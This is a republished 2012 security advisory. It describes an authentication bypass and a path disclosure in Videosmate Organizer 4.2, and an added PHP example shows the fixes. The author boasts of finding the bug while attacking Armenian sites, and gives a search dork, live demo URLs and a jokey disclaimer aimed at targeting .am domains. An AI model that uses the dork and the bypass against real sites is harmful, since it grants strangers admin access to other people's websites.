Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure

2012.10.17
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=====================================================================
Vulnerable software: Videosmate Organizer V 4.2 (all versions)
Vendor: http://videosmate.com/
Software License: Commercial
Vulns: Authentication Bypass & Path Disclosure
Risk: Critical
Dork: intext:Powered by Videosmate Organizer
=====================================================================

Vuln Description:

As I noted above, this script is commercial and that's why today I'm unable (maybe lazy) to show you where the vulnerability is. I discovered this vulnerability while owning Armenian sites.

The flaw: if the remote user is not authenticated against the admin panel (somesite.tld/sitedb/admin/), the script (after its session check) is unable to properly kill its execution. Since I have no access to the source code of this script, I'll try to imagine how this process goes.

Suppose:

    <?php
    session_start();
    if (!isset($_SESSION['am_i_admin_or_am_i_logged_in_admin']))
        echo "<script>self.location='login.php';</script>";
    /* Notice: echo 'JS_REDIRECTION';  ** not **  die('JS_REDIRECTION'); */
    /****** PWNED ********/
    // YOU ARE ADMIN HERE //
    ?>

Exploitation is simple like 2x2: disable JavaScript in your browser and go to:

    site.tld/sitedb/admin/admin.php

(If you wonder, press CTRL+U and you will see something like:

    <script> self.location='login.php';</script>
    <script> self.location='login.php';</script>
)

Demo: http://www.videosmate.com/componentdemo/sitedb/admin/admin.php
(<= Disable JavaScript in your browser or use NoScript, then surf there)

This is not the end!!

PATH DISCLOSURE:

Direct access to: site.tld/componentdemo/include/categoryfuncs.php

Demo: http://www.videosmate.com/componentdemo/include/categoryfuncs.php

    Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
    Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
    Warning: include() [function.include]: Failed opening './settings/conf.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
    Warning: mysql_query() [function.mysql-query]: Access denied for user 'alphonse'@'localhost' (using password: NO) in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
    Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
    Error, query failed

Please note that: I'm not responsible for any damage if the target site !='.am' domain xD))

=====================================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
=====================================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3*
Also special thanks to: ottoman38 & HERO_AZE
=====================================================================
/AkaStep
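The following is an added example, not the vendor's code nor the advisory author's. It puts the session check the advisory reconstructs next to a hardened version, and shows the include-file guard that would have prevented the path disclosure. The file names, the `am_i_admin` session key and the `APP_ENTRY` constant are assumptions.

```php
<?php
// Added example (not Videosmate Organizer code). Two fixes for the two
// issues in the advisory; file/constant names are assumed.

// ---- admin/admin.php: the pattern the advisory describes -----------------
// The check only *prints* a client-side redirect. PHP keeps executing, so a
// client that ignores JavaScript still receives the full admin page body.
function guard_vulnerable(): void
{
    if (!isset($_SESSION['am_i_admin'])) {
        echo "<script>self.location='login.php';</script>";
        // no die()/exit here: everything below still runs unauthenticated
    }
}

// ---- admin/admin.php: hardened -------------------------------------------
// Make the decision server-side and stop. The redirect is a courtesy for
// browsers; exit is the actual control, and a client cannot opt out of it.
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['am_i_admin'])) {
        header('Location: login.php', true, 302);
        exit;
    }
    // Nothing after this point executes for an unauthenticated request.
}

// ---- include/categoryfuncs.php: first lines --------------------------------
// Library files should refuse direct requests instead of running their
// includes and DB queries, which is what leaked the server path and the
// database username in the warnings above. APP_ENTRY is an assumed constant
// that the front controller defines before including any library file.
if (!defined('APP_ENTRY')) {
    http_response_code(404);
    exit;
}

// ---- bootstrap / php.ini for production -----------------------------------
// Even if a query fails, the details belong in the server log, not in the
// HTTP response.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

With `require_admin()` called as the first statement of every admin page, the "view source with JavaScript disabled" trick in the advisory returns only the 302 response.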

References:

http://videosmate.com/


Copyright 2019, cxsecurity.com
